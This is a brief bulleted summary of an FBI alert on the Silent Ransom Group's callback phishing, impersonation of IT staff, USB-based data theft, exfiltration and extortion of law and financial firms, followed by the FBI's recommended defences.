Overview
- In a Spring 2026 flash alert the FBI warned that the Silent Ransom Group uses callback phishing and phone calls to impersonate a company’s IT staff and request remote access.
- If remote desktop access fails the group sends an individual to the victim’s office to insert a USB or external hard drive and copy data directly from machines.
- After gaining access SRG escalates privileges and exfiltrates files using legitimate utilities such as WinSCP or Rclone or by uploading data to cloud accounts like Google Drive and OneDrive.
- The gang then extorts victims by threatening to sell or publish stolen files and by calling employees and clients to increase pressure, which harms client confidentiality and trust at targeted law and financial firms.
- The FBI recommends verifying all claimed IT personnel before granting access, disabling external-drive installs, restricting remote-access ports, enforcing least-privilege access and phishing-resistant multi-factor authentication, and keeping offline backups to limit damage.